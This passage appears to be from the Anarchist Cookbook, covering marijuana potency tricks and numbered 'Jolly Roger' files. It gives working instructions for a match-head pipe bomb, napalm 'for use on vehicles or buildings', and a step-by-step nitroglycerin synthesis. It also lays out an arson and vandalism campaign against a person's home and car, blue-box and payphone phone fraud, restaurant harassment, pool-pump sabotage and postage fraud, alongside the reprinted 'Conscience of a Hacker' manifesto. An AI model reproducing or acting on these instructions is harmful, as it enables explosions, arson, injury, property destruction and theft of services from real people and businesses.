be wise to try it on a plant or two and see what happens.
PLANT PROBLEM CHART
Always check the overall environmental conditions prior to passing judgment -
soil around 7 pH or slightly less - plenty of water, light, fresh air, loose
soil, no water standing in pools.
| SYMPTOM | PROBABLE PROBLEM/CURE |
| Larger leaves turning yellow - smaller leaves still green. | Nitrogen deficiency - add nitrate of soda or organic fertilizer. |
| Older leaves will curl at edges, turn dark, possibly with a purple cast. | Phosphorus deficiency - add commercial phosphate. |
| Mature leaves develop a yellowish cast to least venial areas. | Magnesium deficiency - add commercial fertilizer with a magnesium content. |
| Mature leaves turn yellow and then become spotted with edge areas turning dark gray. | Potassium deficiency - add muriate of potash. |
| Cracked stems, no healthy support tissue. | Boron deficiency - add any plant food containing boron. |
| Small wrinkled leaves with yellowish vein systems. | Zinc deficiency - add commercial plant food containing zinc. |
| Young leaves become deformed, possibly yellowing. | Molybdenum deficiency - use any plant food with a bit of molybdenum in it. |
EXTRA SECTION: BAD WEED/GOOD WEED
Can you turn bad weed into good weed? Surprisingly enough, the answer to this
often-asked inquiry is, yes! Like most other things in life, the amount of good
you are going to do relates directly to how
much effort you are going to put into it. There are no instant, supermarket
products which you can spray on Kansas catnip and have wonderweed, but there are
a number of simplified, inexpensive
processes (Gee, Mr. Wizard!) which will enhance mediocre grass somewhat, and
there are a couple of fairly involved processes which will do up even
almost-parsley weed into something worth
writing home about.
EASES
1. Place the dope in a container which allows air to enter in a restricted
fashion (such as a can with nail holes punched in its lid) and add a bunch of
dry ice, and the place the whole shebang in
the freezer for a few days. This process will add a certain amount of potency to
the product, however, this only works with dry ice, if you use normal, everyday
freezer ice, you will end up with a soggy
mess...
2. Take a quantity of grass and dampen it, place in a baggy or another socially
acceptable container, and store it in a dark, dampish place for a couple of
weeks (burying it also seems to
work). The grass will develop a mold which tastes a bit harsh, a and burns a
tiny bit funny, but does increase the potency.
3. Expose the grass to the high intensity light of a sunlamp for a full day or
so. Personally, I don't feel that this is worth the effort, but if you just
spent $400 of your friend's money for this brick
of super-Colombian, right-from-the-President's-personal-stash, and it turns out
to be Missouri weed, and you're packing your bags to leave town before the
people arrive for their shares, well, you
might at least try it. Can't hurt.
4. Take the undesirable portions of our stash (stems, seeds, weak weed, worms,
etc.) and place them in a covered pot, with enough rubbing alcohol to cover
everything. Now CAREFULLY
boil the mixture on an ELECTRIC stove or lab burner. DO NOT USE GAS - the
alcohol is too flammable. After 45 minutes of heat, remove the pot and strain
the solids out, SAVING THE
ALCOHOL. Now, repeat the process with the same residuals, but fresh alcohol.
When the second boil is over, remove the solids again, combine the two
quantities of alcohol and reboil until you have
a syrupy mixture. Now, this syrupy mixture will contain much of the THC formerly
hidden in the stems and such. One simply takes this syrup the thoroughly
combines it with the grass that one wishes to
improve upon.
SPECIAL SECTION ON RELATED SUBJECT MARYGIN
Marygin is an anagram of the words marijuana and gin, as in Eli Whitney. It is a
plastic tumbler which acts much like a commercial cotton gin. One takes about
one ounce of an herb and breaks it up.
This is then placed in the Marygin and the protruding knob is rotated. This
action turns the internal wheel, which separates the grass from the debris
(seeds, stems). It does not pulverize the grass as
screens have a habit of doing and is easily washable.
Marygin is available from:
P.O. Box 5827
Tucson, Arizona 85703
$5.00
GRASS
Edmund Scientific Company
555 Edscorp Building
Barrington, New Jersey 08007
Free Catalog is a wonder of good things for the potential grass grower. They
have an electric thermostat greenhouse for starting plants. Lights which
approximate the true color balance of the sun and
are probably the most beneficial types available: 40 watt, 48 inch Indoor sun
bulb, 75 or 150 watt. And, they have a natural growth regulator for plants
(Gibberellin) which can change height, speed
growth, and maturity, promote blossoming, etc. Each plant reacts differently to
treatment with Gibberellin...there's no fun like experimenting.
SUGGESTED READING
THE CONNOISSEUR'S HANDBOOK OF MARIJUANA, Bill Drake
Straight Arrow Publishing - $3.50
625 Third Street
San Francisco, California
FLASH
P.O.Box 16098
San Francisco, California 94116
Stocks a series of pamphlets on grass, dope manufacture, cooking. Includes the
Mary Jane Superweed series.
73. Match Head Bomb by The Jolly Roger
Simple safety match heads in a pipe, capped at both ends, make a devastating
bomb. It is set off with a regular fuse. A plastic baggy is put into the pipe
before the heads go in to prevent detonation by
contact with the metal. Cutting enough match heads to fill the pipe can be
tedious work for one but an evening's fun for the family if you can drag them
away from the TV.
74. How To Terrorize McDonalds by The Jolly Roger
Now, although McDonalds is famous for its advertising and making the whole
world think that the BigMac is the best thing to come along since sliced bread
(buns?), each little restaurant is as amateur
and simple as a new-found business. Not only are all the employees rather
inexperienced at what they're supposed to do, but they will just lose all
control when an emergency occurs....here we go!!!
First, get a few friends (4 is good...I'll get to this later) and enter the
McDonalds restaurant, talking loudly and reeking of some strange smell that
automatically makes the old couple sitting by the door
leave. If one of those pimply-faced goons is wiping the floor, then track some
crap all over it (you could pretend to slip and break your head, but you might
actually do so). Next, before you get the
food, find a table. Start yelling and releasing some strange body odor so
anybody would leave their table and walk out the door. Sit two friends there,
and go up to the counter with another. Find a
place where the line is short, or if the line is long say "I only wanna buy a
coke." and you get moved up. Now, you get to do the ordering ...heh heh heh.
Somebody always must want a plain hamburger
with absolutely nothing on it (this takes extra time to make, and drives the
little hamburger-makers insane)..order a 9-pack of chicken McNuggets...no, a 20
pack...no, three 6 packs...wait...go back to
the table and ask who wants what. Your other friend waits by the counter and
makes a pass at the female clerk. Get back to the thing and order three 6-packs
of chicken etc....now she says "What
kind of sauce would you like?". Of course, say that you all want barbecue sauce
one of your friends wants 2 (only if there are only 2 containers of barbecue
sauce left). Then they hafta go into the
storeroom and open up another box. Finally, the drinks...somebody wants coke,
somebody root beer, and somebody diet coke. After these are delivered, bring
them back and say "I didn't order a diet
coke! I ordered a sprite!" This gets them mad; better yet, turn down something
terrible that nobody wants to drink, so they hafta throw the drink away; they
can't sell it. After all the food(?) is handed to
you, you must never have enough money to pay. The clerk will be so angry and
confused that she'll let you get away with it (another influence on her is your
friend asking her "If you let us go, I'll go out
with you." and giving her a fake fone number). Now, back to your table. But
first, somebody likes ketchup and mustard. And plenty (too much) of napkins. Oh,
and somebody likes forks and knives,
so always end up breaking the ones you pick outta the box. Have your friends
yell out, "Yay!!!!! We have munchies!!" as loud as they can. That'll worry the
entire restaurant. Proceed to sit down. So,
you are sitting in the smoking section (by accident) eh? Well, while one of the
tobacco-breathers isn't looking, put a sign from the other side of the room
saying "Do not smoke here" and he'll hafta
move...then he goes into the real non-smoking section, and gets yelled at. He
then thinks that no smoking is allowed in the restaurant, so he eats outside (in
the pouring rain) after your meal is finished
(and quite a few splattered-opened ketchup packets are all over your table), try
to leave. But oops! Somebody has to do his duty in the men's room. As he goes
there, he sticks an uneaten hamburger
(would you dare to eat one of their hamburgers?) Inside the toilet, flushes it a
while, until it runs all over the bathroom. Oops! Send a pimply-faced teenager
to clean it up. (He won't know that brown
thing is a hamburger, and he'll get sick. Wheee!) As you leave the restaurant,
looking back at your uncleaned table, somebody must remember that they left
their chocolate shake there! The one that's
almost full!!!! He takes it then says "This tastes like crap!", Then he takes
off the lid and throws it into the garbage can...oops! He missed, and now the
same poor soul who's cleaning up the bathroom
now hasta clean up chocolate shake. Then leave the joint, reversing the "Yes,
we're open" sign (as a reminder of your visit) There you have it! You have just
put all of McDonalds into complete
mayhem. And since there is no penalty for littering in a restaurant, bugging
people in a public eatery (or throw-upery, in this case) you get off scot-free.
Wasn't that fun?
75. "Mentor's Last Words" by +++The Mentor+++
The following file is being reprinted in honor and sympathy for the many phreaks
and hackers that have been busted recently by the Secret Service.
The Conscience of a Hacker
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me or feels threatened by me or thinks I'm a smart ass or doesn't like teaching and shouldn't be here...damn kid. All he does is play games. They're all alike.
And then it happened. A door opened to a world. Rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
+++The Mentor+++
May the members of the phreak community never forget his words -JR
76. The Myth of the 2600hz Detector by The Jolly Roger
Just about everyone I talk to these days about ESS seems to be scared witless
about the 2600hz detector. I don't know who thought this one up, but it simply
does not exist. So many of you people
whine about this so-called phreak catching device for no reason. Someone with
AT&T said they had it to catch phreakers. This was just to scare the blue-boxers
enough to make them quit boxing free
calls. I'm not saying ESS is without its hang-ups, either. One thing that ESS
can detect readily is the kick-back that the trunk circuitry sends back to the
ESS machine when your little 2600hz tone resets
the toll trunk. After an ESS detects a kickback it turns an M-F detector on and
records any M-F tones transmitted.
Defeating the kick-back detector
As mentioned in my previous note, kick-back detection can be a serious nuisance
to anyone interested in gaining control of a trunk line. The easiest way to
by-pass this detection circuitry is not really
by-passing it at all, it is just letting the kick-back get detected on some
other line. This other line is your local MCI, sprint, or other long distance
carrier (except AT&T). The only catch is that the
service you use must not disconnect the line when you hit the 2600hz tone. This
is how you do it: call up your local extender, put in the code, and dial a
number in the 601 area code and the 644
exchange. Lots of other exchanges work across the country, I'm sure, but this is
the only one that I have found so far. Anyway, when it starts ringing, simply
hit 2600Hz and you'll hear the kick-back,
(ka-chirp, or whatever). Then you are ready to dial whoever you want
(conferences, inward, route and rate, overseas, etc.) From the trunk line in
operator tones! Since blowing 2600Hz doesn't make
you a phreaker until the toll equipment resets the line, kickback detection is
the method AT&T chooses (for now). This information comes as a result of my
experiments & experience and has been
verified by local AT&T employees I have as acquaintances. They could only say
that this is true for my area, but were pretty sure that the same idea is
implemented across the country.
Now that you know how to access a trunk line or as operators say a loop, I will
tell you the many things you can do with it. Here is a list of AT&T services
accessible to you by using a blue box.
A/C+101 TOLL SWITCHING
A/C+121 INWARD OPERATOR
A/C+131 INFORMATION
A/C+141 ROUTE & RATE OP.
A/C+11501 MOBILE OPERATOR
A/C+11521 MOBILE OPERATOR
Starting conferences:
This is one the most useful attributes of blue boxing. Now the confs. are up 24
hours/day and 7 days/week and the billing lines are being billed. Since I
believe the above is true (about the billing lines
being billed) I would recommend that you never let your number show up on the
conf. If you started it, put it on a loop and then call the loop. Enough
bullshit!!!!! To start the conf. Dial one of these
three numbers in m-f while you are on the trunk.
213+080+XXXX
XXXX=1050,3050
SPECIAL XXXX=1000,1100,1200,1500,2200,2500.
These numbers are in LA and are the most watched, I do not advise using this
NPA.
312+001+1050 OR 3050
914+042+1050 OR 1100,1200 ETC.
I believe only 914 works at the moment.
Once connected with one of these you will either hear a re-order, busy, or
chirp. When you hear the chirp enter the billing line in M-F. I use the conf.
dial- up. A billing line example:
kp312+001+1050st you will then hear two tutes and a recording asking you for the
number of conferees including yourself. Enter a number between 20 and 30. If you
ever get over 30 people on a
conference all you will hear is jumbled voices. After the it says "your
conference size is xx" then hit the pound (#) sign. Add your favorite loop on
and hit 6 to transfer control to it. After it says control
will be transferred hang up and call the other side of the loop, hit the pound
sign (#) and follow the instructions. A bonus for conf. is to add an
international number dial 1+011+cc+number pretty cool
ehhh. A few extra notes. Do not add numbers that you will want to hang up, add
these through MCI or Sprint. You cannot blow anyone off with 2600hz unless they
are in an old x-bar or older system.
Many DA operators will stay on after you abuse them; you may have to start
another or at least don't say any numbers. Never add the tone side of a loop
onto a conf. never add more than one MCI
node on your conf.
Route & rate:
Note route & rate and RQS perform the same service. R&R simply tells you route
and rate info which is very valuable, ex. Such as the inward routing for an
exchange in an area code. An inward
routing will let you call her and she can do an emergency interrupt for you. She
can tell you how to get international operators, etc. Here are the terms you are
required to use:
International,
-Operator route for [country, city]. -gives you inward op.
-Directory route for [country, city]. -gives you directory ass.
-City route for [country, city]. -gives you country and city code.
Operator route for [a/c]+ [exchange] -gives you inward op. Route
Ex. [a/c]+ or [a/c]+0xx+ when she says plus she means plus 121.
Numbers route for [state, city] -gives you a/c.
Place name [a/c]+[exchange] -gives you city/state for that a/c and
Exchange.
International calls:
To call international over cable simply access a trunk and dial kp011xxxst wait
for sender tone, kpxxxcc-numberst xxx - a 3 digit country code, it may not be 3
digits so just put 1 or 2 0's in front of it.
Cc - is the city code to go by satellite:
Dial kp18xst x - numbers 2-8 wait for sender tone then Kpxxxccnumberst
77. Blue Box by The Jolly Roger
To quote Karl Marx, blue boxing has always been the most noble form of
phreaking. As opposed to such things as using an MCI code to make a free fone
call, which is merely mindless
pseudo-phreaking, blue boxing is actual interaction with the Bell System toll
network. It is likewise advisable to be more cautious when blue boxing, but the
careful phreak will not be caught, regardless
of what type of switching system he is under. In this part, I will explain how
and why blue boxing works, as well as where. In later parts, I will give more
practical information for blue boxing and routing
information. To begin with, blue boxing is simply communicating with trunks.
Trunks must not be confused with subscriber lines (or "customer loops") which
are standard telefone lines. Trunks are those
lines that connect central offices. Now, when trunks are not in use (i.e., idle
or "on-hook" state) they have 2600Hz applied to them. If they are two-way
trunks, there is 2600Hz in both directions.
When a trunk IS in use (busy or "off-hook" state), the 2600Hz is removed from
the side that is off-hook. The 2600Hz is therefore known as a supervisory
signal, because it indicates the status of a
trunk; on hook (tone) or off-hook (no tone). Note also that 2600Hz denotes SF
(single frequency) signaling and is "in-band." This is very important. "In-band"
means that it is within the band of
frequencies that may be transmitted over normal telefone lines. Other SF
signals, such as 3700Hz are used also. However, they cannot be carried over the
telefone network normally (they are
"out-of-band") and are therefore not able to be taken advantage of as 2600Hz is.
Back to trunks. Let's take a hypothetical phone call. You pick up your fone and
dial 1+806-258-1234 (your good
friend in Amarillo, Texas). For ease, we'll assume that you are on #5 Crossbar
switching and not in the 806 area. Your central office (CO) would recognize that
806 is a foreign NPA, so it would route
the call to the toll center that serves you. [For the sake of accuracy here, and
for the more experienced readers, note that the CO in question is a class 5 with
LAMA that uses out-of-band SF
supervisory signaling]. Depending on where you are in the country, the call
would leave your toll center (on more trunks) to another toll center, or office
of higher "rank". Then it would be routed to
central office 806-258 eventually and the call would be completed.
Illustration
A---CO1-------TC1------TC2----CO2----B
A.... you
CO1.. your central office
TC1.. your toll office.
TC2.. toll office in Amarillo.
CO2.. 806-258 central office.
B.... your friend (806-258-1234)
In this situation it would be realistic to say that CO2 uses SF in-band (2600Hz)
signaling, while all the others use out-of-band signaling (3700Hz). If you don't
understand this, don't worry. I am pointing
this out merely for the sake of accuracy. The point is that while you are
connected to 806-258-1234, all those trunks from YOUR central office (CO1) to
the 806-258 central office (CO2) do *NOT*
have 2600Hz on them, indicating to the Bell equipment that a call is in progress
and the trunks are in use. Now let's say you're tired of talking to your friend
in Amarillo, so you send a 2600Hz down the
line. This tone travels down the line to your friend's central office (CO2)
where it is detected. However, that CO thinks that the 2600Hz is originating
from Bell equipment, indicating to it that you've
hung up, and thus the trunks are once again idle (with 2600Hz present on them).
But actually, you have not hung up, you have fooled the equipment at your
friend's CO into thinking you have. Thus, it
disconnects him and resets the equipment to prepare for the next call. All this
happens very quickly (300-800ms for step-by-step equipment and 150-400ms for
other equipment). When you stop
sending 2600Hz (after about a second), the equipment thinks that another call is
coming towards --> on hook, no tone -->off hook. Now that you've stopped sending
2600Hz, several things happen:
1. A trunk is seized.
2. A "wink" is sent to the CALLING end from the CALLED end indicating that the
CALLED end (trunk) is not ready to receive digits yet.
3. A register is found and attached to the CALLED end of the trunk within about
two seconds (max).
4. A start-dial signal is sent to the CALLING end from the CALLED end indicating
that the CALLED end is ready to receive digits. Now, all of this is pretty much
transparent to the blue
boxer. All he really hears when these four things happen is a <beep><kerchunk>.
So, seizure of a trunk would go something like this:
1. Send a 2600Hz
2. Terminate 2600Hz after 1-2 secs.
3. [beep][kerchunk]
Once this happens, you are connected to a tandem that is ready to obey your
every command. The next step is to send signaling information in order to place
your call. For this you must simulate the
signaling used by operators and automatic toll-dialing equipment for use on
trunks. There are mainly two systems, DP and MF. However, DP went out with the
dinosaurs, so I'll only discuss MF
signaling. MF (multi-frequency) signaling is the signaling used by the majority
of the inter- and intra-lata network. It is also used in international dialing
known as the CCITT No.5 system. MF signals
consist of 7 frequencies, beginning with 700Hz and separated by 200Hz. A
different set of two of the 7 frequencies represent the digits 0 thru 9, plus an
additional 5 special keys. The frequencies and
uses are as follows:
Frequencies(Hz)   Domestic   International
700+900           1          1
700+1100          2          2
900+1100          3          3
700+1300          4          4
900+1300          5          5
1100+1300         6          6
700+1500          7          7
900+1500          8          8
1100+1500         9          9
1300+1500         0          0
700+1700          ST3p       Code 11
900+1700          STp        Code 12
1100+1700         KP         KP1
1300+1700         ST2p       KP2
1500+1700         ST         ST
The timing of all the MF signals is a nominal 60ms, except for KP, which should
have a duration of 100ms. There should also be a 60ms silent period between
digits. This is very flexible however, and
most Bell equipment will accept outrageous timings. In addition to the standard
uses listed above, MF pulsing also has expanded usages known as "expanded inband
signaling" that include such things as
coin collect, coin return, ringback, operator attached,
and operator released. KP2, code 11, and code 12 and the ST_ps (STart "primes")
all have special uses which will be
mentioned only briefly here. To complete a call using a blue box once seizure of
a trunk has been accomplished by sending 2600Hz and pausing for the
<beep><kerchunk>, one must first send a KP.
This readies the register for the digits that follow. For a standard domestic
call, the KP would be followed by either 7 digits (if the call were in the same
NPA as the seized trunk) or 10 digits (if the call
were not in the same NPA as the seized trunk). [Exactly like dialing normal fone
call]. Following either the KP and 7 or 10 digits, a STart is sent to signify
that no more digits follow. Example of a
complete call:
1. Dial 1-806-258-1234
2. Wait for a call-progress indication (such as ring,busy,recording,etc.)
3. Send 2600Hz for about 1 second.
4. Wait for about ll-progress indication (such as ring,busy,recording,etc.)
5. Send KP+305+994+9966+ST
The call will then connect if everything was done properly. Note that if a call
to an 806 number were being placed in the same situation, the are code would be
omitted and only KP + seven digits + ST
would be sent. Code 11 and code 12 are used in international calling to request
certain types of operators. KP2 is used in international calling to route a call
other than by way of the normal route,
whether for economic or equipment reasons. STp, ST2p, and ST3p (prime, two
prime, and three prime) are used in TSPS signaling to indicate calling type of
call (such as coin-direct dialing.
78. Napalm II by The Jolly Roger
[See file #021 of the Cookbook for an easy way to make it!!]
About the best fire bomb is napalm. It has a thick consistency, like jam and is
best for use on vehicles or buildings. Napalms is simply one part gasoline and
one part soap. The soap is either soap flakes
or shredded bar soap. Detergents won't do. The gasoline must be heated in order
for the soap to melt. The usual way is with a double boiler where the top part
has at least a two-quart capacity. The
water in the bottom part is brought to a boil and the double boiler is taken
from the stove and carried to where there is no flame. Then one part, by volume,
of gasoline is put in the top part and allowed
to heat as much as it will and the soap is added and the mess is stirred until
it thickens. A better way to heat gasoline is to fill a bathtub with water as
hot as you can get it. It will hold its heat longer and
permit a much larger container than will the double boiler.
79. Nitroglycerin Recipe by The Jolly Roger
Like all chemists I must advise you all to take the greatest care and caution
when you are doing this. Even if you have made this stuff before. This first
article will give you information on making
nitroglycerin, the basic ingredient in a lot of explosives such as straight
dynamites, and gelatin dynamites.
Making nitroglycerin:
1. Fill a 75-milliliter beaker to the 13 mL. Level with fuming red nitric acid,
of 98% pure concentration.
2. Place the beaker in an ice bath and allow to cool below room temp.
3. After it has cooled, add to it three times the amount of fuming sulferic acid
(99% h2so4). In other words, add to the now-cool fuming nitric acid 39 mL. Of
fuming sulferic acid. When
mixing any acids, always do it slowly and carefully to avoid splattering.
4. When the two are mixed, lower their temp. By adding more ice to the bath,
about 10-15°C. (Use a mercury-operated thermometer)
5. When the acid solution has cooled to the desired temperature, it is ready for
the glycerin. The glycerin must be added in small amounts using a medicine
dropper. (Read this step about 10
times!) Glycerin is added slowly and carefully (I mean careful!) Until the
entire surface of the acid it covered with it.
6. This is a dangerous point since the nitration will take place as soon as the
glycerin is added. The nitration will produce heat, so the solution must be kept
below 30°C! If the solution should
go above 30°C, immediately dump the solution into the ice bath! This will insure
that it does not go off in your face!
7. For the first ten minutes of nitration, the mixture should be gently stirred.
In a normal reaction the nitroglycerin will form as a layer on top of the acid
solution, while the sulferic acid will
absorb the excess water.
8. After the nitration has taken place, and the nitroglycerin has formed on the
top of the solution, the entire beaker should be transferred slowly and
carefully to another beaker of water. When
this is done the nitroglycerin will settle at the bottom so the other acids can
be drained away.
9. After removing as much acid as possible without disturbing the nitroglycerin,
remove the nitroglycerin with an eyedropper and place it in a bicarbonate of
soda (sodium bicarbonate in case
you didn't know) solution. The sodium is an alkali and will neutralize much of
the acid remaining. This process should be repeated as much as necessary using
blue litmus paper to check for the
presence of acid. The remaining acid only makes the nitroglycerin more unstable
than it already is.
10. Finally! The final step is to remove the nitroglycerin from the bicarbonate.
His is done with and eye- dropper, slowly and carefully. The usual test to see
if nitration has been successful is to
place one drop of the nitroglycerin on metal and ignite it. If it is true
nitroglycerin it will burn with a clear blue flame.
** Caution **
Nitro is very sensitive to decomposition, heating dropping, or jarring, and may
explode if left undisturbed and cool.
80. Operation: Fuckup by The Jolly Roger
This is a guide for Anarchists and can be funny for non-believers and 12 and 13
year old runts, and can be a lexicon of deadly knowledge for True Anarchists...
Serious damage is intended to be dealt
here. Do not try this stuff unless you want to do a lot of serious Anarchy.
[Simulation]
Asshole - 'Listen, you little teenager punk shit, shut the fuck up, or I'll
knock you down!'
Anarchist - 'O.K. You can't say I didn't warn you. You don't know my rue
power...' (soooo casually)
Asshole - 'Well, er, what do you mean?
Anarchist - '<demoniac grin>' As you can see, the Anarchist knows something that
this asshole doesn't...
[Operation Fuckup]
Get a wheel barrel or two. Fill with gasoline. Get 16 rolls of toilet paper,
unroll & drench in the gasoline. Rip to shreds in gasoline. Get asbestos gloves.
Light a flare (to be punk), grab glob of saturated
toilet paper (you can ignite the glob or not). Throw either flaming or dripping
glob into:
· Any window (picture is the best)
· Front doors
· Rough grain siding
· Best of all, brick walls
First of all, this bitch is near impossible to get off once dried, and is a
terror to people inside when lit! After this... during the night, get a pickup
truck, a few wheel-barrels, and a dozen friends with
shovels. The pickup can be used only for transporting people and equipment, or
doing that, and carting all the dirt. When it gets around 12:00 (after the loser
goes beddie - bye), dig a gargantuan hole
in his front yard until about 3:00. You can either assign three or four of your
friends to cart the dirt ten miles away in the pickup-bed, or bury his front
door in 15' of dirt! After that is done, get three or
four buckets of tar, and coat his windows. You can make an added twist by
igniting the tar when you are all done and ready to run! That is if the loser
has a house. If he lives inside an apartment
building, you must direct the attack more toward his car, and front door. I
usually start out when he goes to work...I find out what his cheap car looks
like, and memorize it for future abuse...It is always
fun to paint his front door (apt.) hot pink with purple polka-dots, and off-neon
colors in diagonal stripes. You can also pound a few hundred or so four
inch nails into his front door (this looks like somebody really doesn't like you
from the inside). Another great is to fill his keyhole with liquid steel so that
after the bastard closes his door - the only way
to get back in is to break it down. If you can spare it, leave him an axe - that
is, implanted three inches into, and through the door! Now, this next one is
difficult, but one of the best! Get a piece of
wood siding that will more than cover his front door completely. Nail two by
fours on the edges of the siding (all except the bottom) so you have a barge -
like contraption. Make a hole at the top that
will be large enough for a cement slide. Mix about six or seven LARGE bags of
QUICK drying cement. Use the cement slide to fill the antechamber created by the
'barge' that is around his door. Use
more two by fours to brace your little cement-filled barge, and let the little
gem dry. When it is, remove the 'barge' so only a stone monolith remains that
covers his door. Use any remaining cement to
make a base around this so he can't just push it over. When I did this, he
called the fire department, and they thought he meant wood, so they brought
axes. I watched with a few dozen or so other
tenants, and laughed my damn ass off! This is only his door! After he parks his
car for the night, the fun really begins...I start out by opening up the car by
jamming a very thin, but loack - inside and out!
Then proceed to put orange-juice syrup all over the seats, so after he gets
through all the other shit that you do, he will have the stickiest
seats in the world. You can then get a few Sunday papers, and crack one of the
windows about four inches. Lightly crumple the papers, and continue to
completely fill the inside of his car with the
newspapers. A copy of the Sunday New York Times will nicely fill a Volkswagen!
What is also quite amusing is to put his car on cinder blocks, slash his tires
at the top, and fill them with cement!
Leave the cinder blocks there so that, after he knocks the car off of them, he
will get about 3 miles to the gallon with those tires, and do 0 to 60 in about
two minutes! It is even more hilarious when he
doesn't know why the hell why! Another is to open his hood, and then run a few
wires from the sparkplugs to the METAL body. The sure is one HOT car when it is
running! Now, I like to pour two
pounds of sugar down his gas tank. If this doesn't blow every gasket in his
engine it will do something called 'caramelizing his engine'. This is when the
extreme heat turns the sugar to caramel, and you
literally must completely take the engine out and apart, and clean each and
every individual part! Well, if this asshole does not get the message, you had
better start to get serious. If this guide was used
properly & as it was intended (no, not as kindling for the fire), this asshole
will either move far away, seek professional psychological help, commit suicide,
or all of the above!
81. Stealing calls from payphones by The Jolly Roger
Now to make free local calls, you need a finishing nail. I highly recommend "6D
E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 of an inch in diameter and
2 inches long (of course). You also
need a large size paper clip. By large I mean they are about 2in long (FOLDED).
Then you unfold the paper clip. Unfold it by taking each piece and moving it out
90°. When it is done it should look
somewhat like this:
/----------\
: :
: :
: :
: :
\-----
Now, on to the neat stuff. What you do, instead of unscrewing the glued-on
mouthpiece, is insert the nail into the center hole of the mouthpiece (where you
talk) and push it in with pressure or just
hammer it in by hitting the nail on something. Just DON'T KILL THE MOUTHPIECE!
You could damage it if you insert the nail too far or at some weird angle. If
this happens then the other
party won't be able to hear what you say. You now have a hole in the mouthpiece
in which you can easily insert the paper clip. So, take out the nail and put in
the paper clip. Then take the other end
of the paper clip and shove it under the rubber cord protector at the bottom of
the handset (you know, the blue guy...). This should end up looking remotely
like...like this:
/----------\ Mouthpiece
: :
Paper clip --> : : /
: /---:---\
: : :
:------------>
====================\---))):
: To earpiece ->
^ ^
\-------------------->
: :
: :
Cord Blue guy
(The paper clip is shoved under the blue guy to make a good connection between
the inside of the mouthpiece and the metal cord.) Now, dial the number of a
local number you wish to call,
sayyyy, MCI. If everything goes okay, it should ring and not answer with the
"The Call You Have Made Requires a 20 Cent Deposit" recording. After the other
end answers the phone, remove the
paper clip. It's all that simple, see? There are a couple problems, however. One
is, as I mentioned earlier, the mouthpiece not working after you punch it. If
this happens to you, simply move on
to the next payphone. The one you are now on is lost. Another problem is that
the touch tones won't work when the paper clip is in the mouthpiece. There are
two ways around this..
1. Dial the first 6 numbers. This should be done without the paper clip making
the connection, i.e., one side should not be connected. Then connect the paper
clip, hold down the last digit,
and slowly pull the paper clip out at the mouthpiece's end.
2. Don't use the paper clip at all. Keep the nail in after you punch it. Dial
the first 6 digits. Before dialing the last digit, touch the nail head to the
plate on the main body of the phone, the
money safe thingy..then press the last number. The reason that this method is
sometimes called clear boxing is because there is another type of phone which
lets you actually make the call and
listen to them say "Hello, hello?" but it cuts off the mouthpiece so they can't
hear you. The Clear Box is used on that to amplify your voice signals and send
it through the earpiece. If you see
how this is even slightly similar to the method I have just described up there,
kindly explain it to ME!! Cause I don't GET IT! Anyways, this DOES work on
almost all single slot, Dial Tone First
payphones (Pacific Bell for sure). I do it all the time. This is the least, I
STRESS *LEAST*, risky form of Phreaking.
82. Pool Fun by The Jolly Roger
First of all, you need know nothing about pools. The only thing you need know is
what a pool filter looks like. If you don't know that. Second, dress casual.
Preferably, in black. Visit your "friends"
house, the one whose pool looks like fun!! Then you reverse the polarity of
his/her pool, by switching the wires around. They are located in the back of the
pump. This will have quite an effect when the
pump goes on. In other words. Boooooooooooommm! That's right, when you mix +
wires with - plugs, and vice- versa, the 4th of July happens again. Not into
total destruction??? When the pump is
off, switch the pump to "backwash". Turn the pump on and get the phuck out! When
you look the next day, phunny. The pool is dry. If you want permanent damage,
yet no great display like my first
one mentioned, shut the valves of the pool off. (There are usually 2) One that
goes to the main drain and one that goes to the filter in the pool. That should
be enough to have one dead pump. The
pump must take in water, so when there isn't any... Practical jokes: these next
ones deal with true friends and
there is *no* permanent damage done. If you have a pool, you must check the pool
with chemicals. There is one labeled orthotolidine. The other is labeled
alkaline (pH). You want orthotolidine. (It
checks the chlorine). Go to your local pool store and tell them you're going
into the pool business, and to sell you orthotolidine (a CL detector) Buy this
in great quantities if possible. The solution is
clear. You fill 2 baggies with this chemical. And sew the bags to the inside of
your suit. Next, go swimming with your friend! Then open the bags and look like
you're enjoying a piss. And anyone
there will turn a deep red! They will be embarrassed so much, Especially if they
have guests there! Explain what it is, then add vinegar to the pool. Only a
little. The "piss" disappears.
83. Free Postage by The Jolly Roger
The increasing cost of postage to mail letters and packages is bringing down our
standard of living. To remedy this deplorable situation, some counter control
measures can be applied. For example, if
the stamps on a letter are coated with Elmer's Glue by the sender, the
cancellation mark will not destroy the stamp: the Elmer's drives to form an
almost invisible coating that protects the stamps from
the cancellation ink. Later, the receiver of the letter can remove the
cancellation mark with water and reuse the stamps. Furthermore, ecological
saving will also result from recycling the stamps. Help
